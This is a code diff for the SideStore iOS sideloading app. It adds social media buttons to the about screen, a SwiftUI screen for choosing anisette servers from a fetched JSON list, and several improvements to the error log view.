+        <collectionReusableView opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" reuseIdentifier="AboutHeader" id="xq2-Pl-zaG" customClass="AboutPatreonHeaderView" customModule="SideStore" customModuleProvider="target">
+            <rect key="frame" x="0.0" y="0.0" width="390" height="682"/>
             <autoresizingMask key="autoresizingMask"/>
             <subviews>
                 <stackView opaque="NO" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" axis="vertical" spacing="25" translatesAutoresizingMaskIntoConstraints="NO" id="XiA-Jf-XMp">
-                    <rect key="frame" x="16" y="2" width="343" height="393"/>
+                    <rect key="frame" x="16" y="2" width="358" height="630"/>
                     <subviews>
                         <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="5Ol-zN-wYv">
-                            <rect key="frame" x="0.0" y="0.0" width="343" height="317"/>
+                            <rect key="frame" x="0.0" y="0.0" width="358" height="426"/>
                             <subviews>
                                 <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="f7H-EV-7Sx">
-                                    <rect key="frame" x="0.0" y="0.0" width="343" height="55"/>
+                                    <rect key="frame" x="0.0" y="0.0" width="358" height="55"/>
                                     <subviews>
                                         <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="SideStore" translatesAutoresizingMaskIntoConstraints="NO" id="pn6-Ic-MJm">
                                             <rect key="frame" x="0.0" y="0.0" width="55" height="55"/>
@@ -31,7 +31,7 @@
                                             </constraints>
                                         </imageView>
                                         <stackView opaque="NO" contentMode="scaleToFill" distribution="equalSpacing" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="si2-MA-3RH">
-                                            <rect key="frame" x="65" y="0.0" width="278" height="55"/>
+                                            <rect key="frame" x="65" y="0.0" width="293" height="55"/>
                                             <subviews>
                                                 <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="hkS-oz-wiT">
                                                     <rect key="frame" x="0.0" y="0.0" width="83" height="55"/>
@@ -51,7 +51,7 @@
                                                     </subviews>
                                                 </stackView>
                                                 <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="TFB-qo-cbh">
-                                                    <rect key="frame" x="195" y="0.0" width="83" height="55"/>
+                                                    <rect key="frame" x="210" y="0.0" width="83" height="55"/>
                                                     <subviews>
                                                         <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="Zpb-k3-y7l">
                                                             <rect key="frame" x="0.0" y="0.0" width="83" height="50"/>
@@ -75,11 +75,13 @@
                                     </constraints>
                                 </stackView>
                                 <textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" scrollEnabled="NO" editable="NO" textAlignment="natural" selectable="NO" translatesAutoresizingMaskIntoConstraints="NO" id="FeG-e5-LJl">
-                                    <rect key="frame" x="0.0" y="65" width="343" height="252"/>
+                                    <rect key="frame" x="0.0" y="65" width="358" height="361"/>
                                     <color key="backgroundColor" white="1" alpha="0.13" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
-                                    <string key="text">Hello, thank you for using SideStore!
+                                    <string key="text">Thank you for using SideStore!
         
-If you would subscribe to the patreon that would support us and make sure we can continue developing SideStore for you.
+Subscribing to the patreon supports us and makes sure we can continue developing SideStore for you.
+    
+Following us on social media allows us to give quick updates and spread the word about sideloading!
         
 -SideTeam</string>
                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -89,10 +91,10 @@ If you would subscribe to the patreon that would support us and make sure we can
                             </subviews>
                         </stackView>
                         <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="13" translatesAutoresizingMaskIntoConstraints="NO" id="QS9-vO-bj8">
-                            <rect key="frame" x="0.0" y="342" width="343" height="51"/>
+                            <rect key="frame" x="0.0" y="451" width="358" height="179"/>
                             <subviews>
                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="yEi-L6-kQ8">
-                                    <rect key="frame" x="0.0" y="0.0" width="343" height="51"/>
+                                    <rect key="frame" x="0.0" y="0.0" width="358" height="51"/>
                                     <color key="backgroundColor" name="SettingsHighlighted"/>
                                     <constraints>
                                         <constraint firstAttribute="height" constant="51" id="l4o-vb-cMy"/>
@@ -102,6 +104,28 @@ If you would subscribe to the patreon that would support us and make sure we can
                                         <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </state>
                                 </button>
+                                <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="hov-Ce-LaM" userLabel="Twitter Button">
+                                    <rect key="frame" x="0.0" y="64" width="358" height="51"/>
+                                    <color key="backgroundColor" name="SettingsHighlighted"/>
+                                    <constraints>
+                                        <constraint firstAttribute="height" constant="51" id="m0M-GX-KKG"/>
+                                    </constraints>
+                                    <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="19"/>
+                                    <state key="normal" title="Follow us on Twitter!">
+                                        <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </state>
+                                </button>
+                                <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="VdY-7Q-amF" userLabel="Twitter Button">
+                                    <rect key="frame" x="0.0" y="128" width="358" height="51"/>
+                                    <color key="backgroundColor" name="SettingsHighlighted"/>
+                                    <constraints>
+                                        <constraint firstAttribute="height" constant="51" id="kDo-b8-6tZ"/>
+                                    </constraints>
+                                    <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="19"/>
+                                    <state key="normal" title="Follow us on Instagram!">
+                                        <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </state>
+                                </button>
                             </subviews>
                         </stackView>
                     </subviews>
@@ -114,19 +138,21 @@ If you would subscribe to the patreon that would support us and make sure we can
                 <constraint firstItem="XiA-Jf-XMp" firstAttribute="top" secondItem="xq2-Pl-zaG" secondAttribute="top" constant="2" id="j8p-JX-Dcz"/>
             </constraints>
             <connections>
+                <outlet property="instagramButton" destination="VdY-7Q-amF" id="5kj-9x-k4F"/>
                 <outlet property="rileyImageView" destination="pn6-Ic-MJm" id="60i-Q0-ojz"/>
                 <outlet property="rileyLabel" destination="DTd-Yu-HXr" id="O0y-JB-gWp"/>
                 <outlet property="shaneLabel" destination="Zpb-k3-y7l" id="aQN-6B-s5T"/>
                 <outlet property="supportButton" destination="yEi-L6-kQ8" id="Dzo-vd-SnD"/>
                 <outlet property="textView" destination="FeG-e5-LJl" id="K0M-lF-I6u"/>
+                <outlet property="twitterButton" destination="hov-Ce-LaM" id="gib-Lt-qtY"/>
             </connections>
-            <point key="canvasLocation" x="138" y="138"/>
+            <point key="canvasLocation" x="147.82608695652175" y="58.258928571428569"/>
         </collectionReusableView>
     </objects>
     <resources>
-        <image name="SideStore" width="180" height="180"/>
+        <image name="SideStore" width="1024" height="1024"/>
         <namedColor name="SettingsHighlighted">
-            <color red="0.23529411764705882" green="0.0" blue="0.40392156862745099" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.38823529411764707" green="0.011764705882352941" blue="0.58823529411764708" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
     </resources>
 </document>

AltStore/Settings/AnisetteManager.swift

@@ -10,6 +10,11 @@ import Foundation
 
 public struct AnisetteManager {
     
+    var menuURL: String {
+        var url: String
+        url = UserDefaults.standard.menuAnisetteURL
+        return url
+    }
     /// User defined URL from Settings/UserDefaults
     static var userURL: String? {
         var urlString: String?

AltStore/Settings/AnisetteServerList.swift

@@ -0,0 +1,220 @@
+//
+//  AnisetteServerList.swift
+//  SideStore
+//
+//  Created by ny on 6/18/24.
+//  Copyright © 2024 SideStore. All rights reserved.
+//
+
+import UIKit
+import SwiftUI
+import AltStoreCore
+
+typealias SUIButton = SwiftUI.Button
+
+// MARK: - AnisetteServerData
+struct AnisetteServerData: Codable {
+    let servers: [Server]
+}
+
+// MARK: - Server
+struct Server: Codable {
+    var name: String
+    var address: String
+}
+
+class AnisetteViewModel: ObservableObject {
+    @Published var selected: String = ""
+
+    @Published var source: String = "https://servers.sidestore.io/servers.json"
+    @Published var servers: [Server] = []
+    
+    init() {
+        // using the custom Anisette list
+        if !UserDefaults.standard.menuAnisetteList.isEmpty {
+            self.source = UserDefaults.standard.menuAnisetteList
+        }
+    }
+    
+    func getListOfServers() {
+        guard let url = URL(string: source) else { return }
+        URLSession.shared.dataTask(with: url) { data, response, error in
+            if let error = error {
+                return
+            }
+            if let data = data {
+                do {
+                    let decoder = Foundation.JSONDecoder()
+                    let servers = try decoder.decode(AnisetteServerData.self, from: data)
+                    DispatchQueue.main.async {
+                        self.servers = servers.servers
+                    }
+                } catch {
+                    // Handle decoding error
+                    print("Failed to decode JSON: \(error)")
+                }
+            }
+        }.resume()
+    }
+}
+
+struct AnisetteServers: View {
+    @Environment(\.presentationMode) var presentationMode
+    @StateObject var viewModel: AnisetteViewModel = AnisetteViewModel()
+    @State var selected: String? = nil
+    @State private var showingConfirmation = false
+    var errorCallback: () -> ()
+
+    var body: some View {
+        ZStack {
+            Color(UIColor.systemBackground)
+                .ignoresSafeArea()
+                .onAppear {
+                    viewModel.getListOfServers()
+                }
+            VStack {
+                if #available(iOS 16.0, *) {
+                    SwiftUI.List($viewModel.servers, id: \.address, selection: $selected) { server in
+                        HStack {
+                            VStack(alignment: .leading) {
+                                Text("\(server.name.wrappedValue)")
+                                    .font(.headline)
+                                    .foregroundColor(.primary)
+                                Text("\(server.address.wrappedValue)")
+                                    .font(.subheadline)
+                                    .foregroundColor(.secondary)
+                            }
+                            Spacer()
+                            if selected != nil {
+                                if server.address.wrappedValue == selected {
+                                    Spacer()
+                                    Image(systemName: "checkmark.circle.fill")
+                                        .foregroundColor(.accentColor)
+                                        .onAppear {
+                                            UserDefaults.standard.menuAnisetteURL = server.address.wrappedValue
+                                            print(UserDefaults.synchronize(.standard)())
+                                            print(UserDefaults.standard.menuAnisetteURL)
+                                            print(server.address.wrappedValue)
+                                        }
+                                }
+                            }
+                        }
+                        .padding()
+                        .background(RoundedRectangle(cornerRadius: 10).fill(Color(UIColor.secondarySystemBackground)))
+                        .shadow(color: Color.black.opacity(0.2), radius: 5, x: 0, y: 5)
+                    }
+                    .listStyle(.plain)
+                    .scrollContentBackground(.hidden)
+                    .listRowBackground(Color(UIColor.systemBackground))
+                } else {
+                    List(selection: $selected) {
+                        ForEach($viewModel.servers, id: \.name) { server in
+                            VStack {
+                                HStack {
+                                    Text("\(server.name.wrappedValue)")
+                                        .foregroundColor(.primary)
+                                        .frame(alignment: .center)
+                                    Text("\(server.address.wrappedValue)")
+                                        .foregroundColor(.secondary)
+                                        .frame(alignment: .center)
+                                }
+                            }
+                            Spacer()
+                        }
+                        .padding()
+                        .background(RoundedRectangle(cornerRadius: 10).fill(Color(UIColor.secondarySystemBackground)))
+                        .shadow(color: Color.black.opacity(0.2), radius: 5, x: 0, y: 5)
+                    }
+                    .listStyle(.plain)
+                }
+                
+                VStack(spacing: 16) {
+                    TextField("Anisette Server List", text: $viewModel.source)
+                        .padding()
+                        .background(RoundedRectangle(cornerRadius: 10).fill(Color(UIColor.secondarySystemFill)))
+                        .foregroundColor(.primary)
+                        .frame(height: 60)
+                        .shadow(color: Color.black.opacity(0.2), radius: 5, x: 0, y: 5)
+                        .onChange(of: viewModel.source) { newValue in
+                            UserDefaults.standard.menuAnisetteList = newValue
+                            viewModel.getListOfServers()
+                        }
+
+                    HStack(spacing: 16) {
+                        SUIButton(action: {
+                            presentationMode.wrappedValue.dismiss()
+                        }) {
+                            HStack{
+                                Spacer()
+                                Text("Back")
+                                    .fontWeight(.semibold)
+                                Spacer()
+                            }
+                            .contentShape(Rectangle())
+                        }
+                        .buttonStyle(PlainButtonStyle())
+                        .padding()
+                        .background(RoundedRectangle(cornerRadius: 10).fill(Color.accentColor))
+                        .foregroundColor(.white)
+                        .shadow(color: Color.accentColor.opacity(0.4), radius: 10, x: 0, y: 5)
+
+                        SUIButton(action: {
+                            viewModel.getListOfServers()
+                        }) {
+                            HStack{
+                                Spacer()
+                                Text("Refresh Servers")
+                                    .fontWeight(.semibold)
+                                    .frame(maxWidth: .infinity)
+                                Spacer()
+                            }
+                            .contentShape(Rectangle())
+                        }
+                        .buttonStyle(PlainButtonStyle())
+                        .padding()
+                        .background(RoundedRectangle(cornerRadius: 10).fill(Color.accentColor))
+                        .foregroundColor(.white)
+                        .shadow(color: Color.accentColor.opacity(0.4), radius: 10, x: 0, y: 5)
+                        
+                    }
+
+                    SUIButton(action: {
+                        showingConfirmation = true
+                    }) {
+                        Text("Reset adi.pb")
+                            .fontWeight(.semibold)
+                            .frame(maxWidth: .infinity)
+                    }
+                    .buttonStyle(PlainButtonStyle())
+                    .padding()
+                    .background(RoundedRectangle(cornerRadius: 10).fill(Color.red))
+                    .foregroundColor(.white)
+                    .shadow(color: Color.red.opacity(0.4), radius: 10, x: 0, y: 5)
+                    .alert(isPresented: $showingConfirmation) {
+                        Alert(
+                            title: Text("Reset adi.pb"),
+                            message: Text("are you sure to clear the adi.pb from keychain？"),
+                            primaryButton: .default(Text("do it")) {
+                                #if !DEBUG
+                                if Keychain.shared.adiPb != nil {
+                                    Keychain.shared.adiPb = nil
+                                }
+                                #endif
+                                print("Cleared adi.pb from keychain")
+                                errorCallback()
+                                presentationMode.wrappedValue.dismiss()
+                            },
+                            secondaryButton: .cancel(Text("cancel")) {
+                                print("canceled")
+                            }
+                        )
+                    }
+                }
+                .padding(.horizontal)
+                .padding(.bottom)
+            }
+        }
+        .navigationBarHidden(true)
+        .navigationTitle("")
+    }
+}

AltStore/Settings/Error Log/ErrorDetailsViewController.swift

@@ -0,0 +1,53 @@
+//
+//  ErrorDetailsViewController.swift
+//  AltStore
+//
+//  Created by Riley Testut on 10/5/22.
+//  Copyright © 2022 Riley Testut. All rights reserved.
+//
+
+import UIKit
+
+import AltStoreCore
+
+class ErrorDetailsViewController: UIViewController
+{
+    var loggedError: LoggedError?
+
+    @IBOutlet private var textView: UITextView!
+
+    override func viewDidLoad()
+    {
+        super.viewDidLoad()
+
+        if let error = self.loggedError?.error
+        {
+            self.title = error.localizedErrorCode
+
+            let font = self.textView.font ?? UIFont.preferredFont(forTextStyle: .body)
+            let detailedDescription = error.formattedDetailedDescription(with: font)
+            self.textView.attributedText = detailedDescription
+        }
+        else
+        {
+            self.title = NSLocalizedString("Error Details", comment: "")
+        }
+
+        self.navigationController?.navigationBar.tintColor = .altPrimary
+
+        if #available(iOS 15, *), let sheetController = self.navigationController?.sheetPresentationController
+        {
+            sheetController.detents = [.medium(), .large()]
+            sheetController.selectedDetentIdentifier = .medium
+            sheetController.prefersGrabberVisible = true
+        }
+    }
+
+    override func viewDidLayoutSubviews()
+    {
+        super.viewDidLayoutSubviews()
+
+        self.textView.textContainerInset.left = self.view.layoutMargins.left
+        self.textView.textContainerInset.right = self.view.layoutMargins.right
+    }
+}

AltStore/Settings/Error Log/ErrorLogTableViewCell.swift

@@ -8,6 +8,16 @@
 
 import UIKit
 
+@objc(ErrorLogMenuButton)
+private final class ErrorLogMenuButton: UIButton {
+    @available(iOS 14.0, *)
+    override func menuAttachmentPoint(for configuration: UIContextMenuConfiguration) -> CGPoint {
+        var point = super.menuAttachmentPoint(for: configuration)
+        point.y = self.bounds.midY
+        return point
+    }
+}
+
 @objc(ErrorLogTableViewCell)
 final class ErrorLogTableViewCell: UITableViewCell
 {

AltStore/Settings/Error Log/ErrorLogViewController.swift

@@ -21,6 +21,13 @@ final class ErrorLogViewController: UITableViewController
     private lazy var dataSource = self.makeDataSource()
     private var expandedErrorIDs = Set<NSManagedObjectID>()
     
+    private var isScrolling = false {
+        didSet {
+            guard self.isScrolling != oldValue else { return }
+            self.updateButtonInteractivity()
+        }
+    }
+
     private lazy var timeFormatter: DateFormatter = {
         let dateFormatter = DateFormatter()
         dateFormatter.dateStyle = .none
@@ -39,6 +46,15 @@ final class ErrorLogViewController: UITableViewController
         self.tableView.dataSource = self.dataSource
         self.tableView.prefetchDataSource = self.dataSource
     }
+
+    override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
+        guard let loggedError = sender as? LoggedError, segue.identifier == "showErrorDetails" else { return }
+
+        let navigationController = segue.destination as! UINavigationController
+
+        let errorDetailsViewController = navigationController.viewControllers.first as! ErrorDetailsViewController
+        errorDetailsViewController.loggedError = loggedError
+    }
 }
 
 private extension ErrorLogViewController
@@ -60,14 +76,8 @@ private extension ErrorLogViewController
             let cell = cell as! ErrorLogTableViewCell
             cell.dateLabel.text = self.timeFormatter.string(from: loggedError.date)
             cell.errorFailureLabel.text = loggedError.localizedFailure ?? NSLocalizedString("Operation Failed", comment: "")
-            
-            switch loggedError.domain
-            {
-            case AltServerErrorDomain: cell.errorCodeLabel?.text = String(format: NSLocalizedString("AltServer Error %@", comment: ""), NSNumber(value: loggedError.code))
-            case OperationError.domain: cell.errorCodeLabel?.text = String(format: NSLocalizedString("AltStore Error %@", comment: ""), NSNumber(value: loggedError.code))
-            default: cell.errorCodeLabel?.text = loggedError.error.localizedErrorCode
-            }
-            
+            cell.errorCodeLabel.text = loggedError.error.localizedErrorCode
+
             let nsError = loggedError.error as NSError
             let errorDescription = [nsError.localizedDescription, nsError.localizedRecoverySuggestion].compactMap { $0 }.joined(separator: "\n\n")
             cell.errorDescriptionTextView.text = errorDescription
@@ -93,12 +103,19 @@ private extension ErrorLogViewController
                     },
                     UIAction(title: NSLocalizedString("Search FAQ", comment: ""), image: UIImage(systemName: "magnifyingglass")) { [weak self] _ in
                         self?.searchFAQ(for: loggedError)
-                    }
+                    },
+                    UIAction(title: NSLocalizedString("View More Details", comment: ""), image: UIImage(systemName: "ellipsis.circle")) { [weak self] _ in
+                        self?.viewMoreDetails(for: loggedError)
+                    },
                 ])
 
                 cell.menuButton.menu = menu
+                cell.menuButton.showsMenuAsPrimaryAction = self.isScrolling ? false : true
+                cell.selectionStyle = .none
+            } else {
+                cell.menuButton.isUserInteractionEnabled = false
             }
-            
+
             // Include errorDescriptionTextView's text in cell summary.
             cell.accessibilityLabel = [cell.errorFailureLabel.text, cell.dateLabel.text, cell.errorCodeLabel.text, cell.errorDescriptionTextView.text].compactMap { $0 }.joined(separator: ". ")
             
@@ -232,22 +249,27 @@ private extension ErrorLogViewController
     
     func searchFAQ(for loggedError: LoggedError)
     {
-        let baseURL = URL(string: "https://faq.altstore.io/getting-started/troubleshooting-guide")!
+        let baseURL = URL(string: "https://faq.altstore.io/getting-started/error-codes")!
         var components = URLComponents(url: baseURL, resolvingAgainstBaseURL: false)!
         
-        let query = [loggedError.domain, "\(loggedError.code)"].joined(separator: "+")
+        let query = [loggedError.domain, "\(loggedError.error.displayCode)"].joined(separator: "+")
         components.queryItems = [URLQueryItem(name: "q", value: query)]
         
         let safariViewController = SFSafariViewController(url: components.url ?? baseURL)
         safariViewController.preferredControlTintColor = .altPrimary
         self.present(safariViewController, animated: true)
     }
+
+    func viewMoreDetails(for loggedError: LoggedError) {
+        self.performSegue(withIdentifier: "showErrorDetails", sender: loggedError)
+    }
 }
 
 extension ErrorLogViewController
 {
     override func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath)
     {
+        guard #unavailable(iOS 14) else { return }
         let loggedError = self.dataSource.item(at: indexPath)
         
         let alertController = UIAlertController(title: nil, message: nil, preferredStyle: .actionSheet)
@@ -321,3 +343,32 @@ extension ErrorLogViewController: QLPreviewControllerDataSource {
         return fileURL as QLPreviewItem
     }
 }
+
+extension ErrorLogViewController
+{
+    override func scrollViewWillBeginDragging(_ scrollView: UIScrollView)
+    {
+        self.isScrolling = true
+    }
+
+    override func scrollViewDidEndDecelerating(_ scrollView: UIScrollView)
+    {
+        self.isScrolling = false
+    }
+
+    override func scrollViewDidEndDragging(_ scrollView: UIScrollView, willDecelerate decelerate: Bool)
+    {
+        guard !decelerate else { return }
+        self.isScrolling = false
+    }
+
+    private func updateButtonInteractivity()
+    {
+        guard #available(iOS 14, *) else { return }
+
+        for case let cell as ErrorLogTableViewCell in self.tableView.visibleCells
+        {
+            cell.menuButton.showsMenuAsPrimaryAction = self.isScrolling ? false : true
+        }
+    }
+}

AltStore/Settings/PatreonComponents.swift

@@ -56,6 +56,8 @@ final class PatronsFooterView: UICollectionReusableView
 final class AboutPatreonHeaderView: UICollectionReusableView
 {
     @IBOutlet var supportButton: UIButton!
+    @IBOutlet var twitterButton: UIButton!
+    @IBOutlet var instagramButton: UIButton!
     @IBOutlet var accountButton: UIButton!
     @IBOutlet var textView: UITextView!
     
@@ -79,12 +81,12 @@ final class AboutPatreonHeaderView: UICollectionReusableView
             imageView.layer.cornerRadius = imageView.bounds.midY
         }
         
-        for button in [self.supportButton, self.accountButton].compactMap({ $0 })
+        for button in [self.supportButton, self.accountButton, self.twitterButton, self.instagramButton].compactMap({ $0 })
         {
             button.clipsToBounds = true
             button.layer.cornerRadius = 16
         }
-    }
+}
     
     override func layoutMarginsDidChange()
     {

AltStore/Settings/PatreonViewController.swift

@@ -111,7 +111,9 @@ private extension PatreonViewController
         headerView.layoutMargins = self.view.layoutMargins
         
         headerView.supportButton.addTarget(self, action: #selector(PatreonViewController.openPatreonURL(_:)), for: .primaryActionTriggered)
-        
+        headerView.twitterButton.addTarget(self, action: #selector(PatreonViewController.openTwitterURL(_:)), for: .primaryActionTriggered)
+        headerView.instagramButton.addTarget(self, action: #selector(PatreonViewController.openInstagramURL(_:)), for: .primaryActionTriggered)
+
         let defaultSupportButtonTitle = NSLocalizedString("Become a patron", comment: "")
         let isPatronSupportButtonTitle = NSLocalizedString("View Patreon", comment: "")
         
@@ -126,7 +128,7 @@ private extension PatreonViewController
         let isPatronText = NSLocalizedString("""
         Hey ,
         
-        You’re the best. Your account was linked successfully, so you now have access to the beta versions of all of our apps. You can find them all in the Browse tab.
+        You’re the best. Your account was linked successfully, so you now have access to any beta versions of our apps. You can find them all in the Browse tab.
         
         Thanks for all of your support. Enjoy!
         - SideTeam
@@ -173,13 +175,31 @@ private extension PatreonViewController
     
     @objc func openPatreonURL(_ sender: UIButton)
     {
-        let patreonURL = URL(string: "https://www.patreon.com/SideStore")!
+        let patreonURL = URL(string: "https://www.patreon.com/SideStoreIO")!
         
         let safariViewController = SFSafariViewController(url: patreonURL)
         safariViewController.preferredControlTintColor = self.view.tintColor
         self.present(safariViewController, animated: true, completion: nil)
     }
     
+    @objc func openTwitterURL(_ sender: UIButton)
+    {
+        let twitterURL = URL(string: "https://twitter.com/SideStore_io")!
+        
+        let safariViewController = SFSafariViewController(url: twitterURL)
+        safariViewController.preferredControlTintColor = self.view.tintColor
+        self.present(safariViewController, animated: true, completion: nil)
+    }
+    
+    @objc func openInstagramURL(_ sender: UIButton)
+    {
+        let twitterURL = URL(string: "https://instagram.com/sidestore.io")!
+        
+        let safariViewController = SFSafariViewController(url: twitterURL)
+        safariViewController.preferredControlTintColor = self.view.tintColor
+        self.present(safariViewController, animated: true, completion: nil)
+    }
+    
     @IBAction func authenticate(_ sender: UIBarButtonItem)
     {
         PatreonAPI.shared.authenticate { (result) in
@@ -328,7 +348,7 @@ extension PatreonViewController: UICollectionViewDelegateFlowLayout
         switch section
         {
         case .about: return .zero
-        case .patrons: return CGSize(width: 0, height: 0)
+        case .patrons: return CGSize(width: 320, height: 44)
         }
     }
 }

AltStore/Settings/Settings.storyboard

@@ -1,9 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="21507" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="5Rz-4h-jJ8">
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="32700.99.1234" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="5Rz-4h-jJ8">
     <device id="retina4_7" orientation="portrait" appearance="light"/>
     <dependencies>
         <deployment identifier="iOS"/>
-        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21505"/>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="22685"/>
         <capability name="Named colors" minToolsVersion="9.0"/>
         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
         <capability name="System colors in document resources" minToolsVersion="11.0"/>
@@ -20,8 +20,8 @@
                         <color key="backgroundColor" name="SettingsBackground"/>
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="separatorColor" white="1" alpha="0.25" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
-                        <label key="tableFooterView" opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore 1.0" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" id="bUR-rp-Nw2">
-                            <rect key="frame" x="0.0" y="1234" width="375" height="25"/>
+                        <label key="tableFooterView" opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore 1.0" textAlignment="center" lineBreakMode="wordWrap" numberOfLines="0" baselineAdjustment="alignBaselines" adjustsFontForContentSizeCategory="YES" adjustsFontSizeToFit="NO" id="bUR-rp-Nw2">
+                            <rect key="frame" x="0.0" y="1347" width="375" height="25"/>
                             <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
                             <fontDescription key="fontDescription" type="system" pointSize="17"/>
                             <color key="textColor" white="1" alpha="0.69999999999999996" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -167,8 +167,8 @@
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Join the beta" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3Il-5a-5Zp">
-                                                    <rect key="frame" x="30" y="15.499999999999998" width="106" height="20.5"/>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Support the team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3Il-5a-5Zp">
+                                                    <rect key="frame" x="30" y="15.5" width="142.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
@@ -208,7 +208,7 @@
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
                                                 <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Background Refresh" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="EbG-HB-IOn">
-                                                    <rect key="frame" x="30" y="15.499999999999998" width="166" height="20.5"/>
+                                                    <rect key="frame" x="30" y="15.5" width="166" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
@@ -236,15 +236,87 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="NO"/>
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="GYp-O0-pse" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
                                         <rect key="frame" x="0.0" y="444" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
